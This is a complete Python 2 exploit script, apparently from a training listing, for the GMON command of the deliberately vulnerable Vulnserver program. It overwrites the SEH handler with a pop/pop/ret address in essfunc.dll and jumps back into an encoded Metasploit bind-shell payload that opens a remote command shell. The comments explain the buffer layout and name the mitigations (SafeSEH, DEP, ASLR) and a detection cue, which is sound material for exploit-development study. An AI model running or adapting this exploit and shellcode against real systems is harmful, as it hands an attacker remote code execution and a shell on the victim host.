#Listing 5: Vulnserver-Exploit

import socket
import sys


# Target host and TCP port, taken verbatim from the command line.
# There is no validation: a missing argument raises IndexError and a
# non-numeric port makes int() raise ValueError.
ip 	= str(sys.argv[1])
port 	= int(sys.argv[2])

# Layout constants for the GMON argument (see the pattern assembly below).
# offset_to_nseh: bytes from the start of the argument to the four bytes
#   that land on the nSEH pointer.
# jmp_back: distance (in bytes) travelled by the final backward jump; the
#   shellcode is positioned so that this jump lands exactly on its first byte.
offset_to_nseh = 3498
jmp_back = 800

# msfpayload windows/shell_bind_tcp R | ./msfencode -b '\x00\x0a\x0d' -t c 
# [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
# The payload is opaque encoded bytes; the three excluded values above are the
# bytes assumed not to survive the GMON handler intact.
# NOTE(review): the 368-byte size is the generator's claim quoted above, not
# something this script checks; the padding math uses len(shellcode), so a
# payload of a different length still lines up as long as it fits in the
# jmp_back - 12 byte window.

shellcode = (
"\xd9\xcb\xd9\x74\x24\xf4\xbf\x79\xe7\xa5\x96\x5d\x31\xc9\xb1"
"\x56\x83\xc5\x04\x31\x7d\x14\x03\x7d\x6d\x05\x50\x6a\x65\x40"
"\x9b\x93\x75\x33\x15\x76\x44\x61\x41\xf2\xf4\xb5\x01\x56\xf4"
"\x3e\x47\x43\x8f\x33\x40\x64\x38\xf9\xb6\x4b\xb9\xcf\x76\x07"
"\x79\x51\x0b\x5a\xad\xb1\x32\x95\xa0\xb0\x73\xc8\x4a\xe0\x2c"
"\x86\xf8\x15\x58\xda\xc0\x14\x8e\x50\x78\x6f\xab\xa7\x0c\xc5"
"\xb2\xf7\xbc\x52\xfc\xef\xb7\x3d\xdd\x0e\x14\x5e\x21\x58\x11"
"\x95\xd1\x5b\xf3\xe7\x1a\x6a\x3b\xab\x24\x42\xb6\xb5\x61\x65"
"\x28\xc0\x99\x95\xd5\xd3\x59\xe7\x01\x51\x7c\x4f\xc2\xc1\xa4"
"\x71\x07\x97\x2f\x7d\xec\xd3\x68\x62\xf3\x30\x03\x9e\x78\xb7"
"\xc4\x16\x3a\x9c\xc0\x73\x99\xbd\x51\xde\x4c\xc1\x82\x86\x31"
"\x67\xc8\x25\x26\x11\x93\x21\x8b\x2c\x2c\xb2\x83\x27\x5f\x80"
"\x0c\x9c\xf7\xa8\xc5\x3a\x0f\xce\xfc\xfb\x9f\x31\xfe\xfb\xb6"
"\xf5\xaa\xab\xa0\xdc\xd2\x27\x31\xe0\x07\xe7\x61\x4e\xf7\x48"
"\xd2\x2e\xa7\x20\x38\xa1\x98\x51\x43\x6b\xaf\x55\x8d\x4f\xfc"
"\x31\xec\x6f\x13\x9e\x79\x89\x79\x0e\x2c\x01\x15\xec\x0b\x9a"
"\x82\x0f\x7e\xb6\x1b\x98\x36\xd0\x9b\xa7\xc6\xf6\x88\x04\x6e"
"\x91\x5a\x47\xab\x80\x5d\x42\x9b\xcb\x66\x05\x51\xa2\x25\xb7"
"\x66\xef\xdd\x54\xf4\x74\x1d\x12\xe5\x22\x4a\x73\xdb\x3a\x1e"
"\x69\x42\x95\x3c\x70\x12\xde\x84\xaf\xe7\xe1\x05\x3d\x53\xc6"
"\x15\xfb\x5c\x42\x41\x53\x0b\x1c\x3f\x15\xe5\xee\xe9\xcf\x5a"
"\xb9\x7d\x89\x90\x7a\xfb\x96\xfc\x0c\xe3\x27\xa9\x48\x1c\x87"
"\x3d\x5d\x65\xf5\xdd\xa2\xbc\xbd\xee\xe8\x9c\x94\x66\xb5\x75"
"\xa5\xea\x46\xa0\xea\x12\xc5\x40\x93\xe0\xd5\x21\x96\xad\x51"
"\xda\xea\xbe\x37\xdc\x59\xbe\x1d")


# Layout of the GMON argument (sizes in bytes; the pieces sum to exactly 5000):
#   junk 1      offset_to_nseh - jmp_back + 12
#   shellcode   len(shellcode)
#   X filler    jmp_back - 12 - len(shellcode)   -> nSEH sits at offset_to_nseh
#   nSEH        4   short jmp forward, skipping the SEH pointer and junk 2
#   SEH         4   fixed address of a pop/pop/ret sequence in essfunc.dll
#   junk 2      4   0xCC (int3) bytes; execution does not rely on them
#   jmp back    5   near jmp, rel32 0xfffffcdb = -805 from the next
#                   instruction, i.e. 800 bytes before the jmp itself, which is
#                   exactly the first shellcode byte
#   trailer     5000 - offset_to_nseh - 17
# NOTE: the 12 is the combined length of nSEH, SEH and junk 2; the backward
# 	jump starts after them, so it must be accounted for in the junk 1 size.
# Mitigation context: a fixed module address in the SEH slot implies the
# module lacks SafeSEH/ASLR; SafeSEH, DEP and ASLR each break this SEH
# overwrite pattern, and a 5000-byte GMON argument is a simple detection cue.
pattern = "A" * (offset_to_nseh - jmp_back + 12)  # junk 1
pattern += shellcode
pattern += "X" * (jmp_back - 12 -len(shellcode))
pattern += "\xeb\x0a\x90\x90"		# pointer to nSEH: jmp $+0x0a (followed by two nops)
pattern += "\xb4\x10\x50\x62"		# pointer to SEH: 0x625010b4 (pop/pop/ret @ essfunc.dll)
pattern += "\xCC" * 4			# junk 2
pattern += "\xe9\xdb\xfc\xff\xff"	# jmp $-800 (backwards)
pattern += "C" * (5000 - offset_to_nseh - 17)


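# Deliver the GMON request and report what the server answers.
# Only socket-level failures are caught and the underlying error is printed;
# the previous bare except hid KeyboardInterrupt and programming errors behind
# a misleading "Unable to connect" message, and never closed the socket.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
	print "\nConnecting to %s:%d" % (ip, port)
	s.connect((ip, port))
	data = s.recv(1024)		# server banner
	print "[x]", data
	print "[x] Sending packet?"
	request = 'GMON /' + pattern	# 'buffer' renamed: it shadowed the builtin
	s.send(request + '\r\n')
	data = s.recv(1024)		# a reset or empty read here is the expected outcome
	print "Is it dead?"
except socket.error as exc:
	print "[!] Unable to connect... :(", exc
finally:
	s.close()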


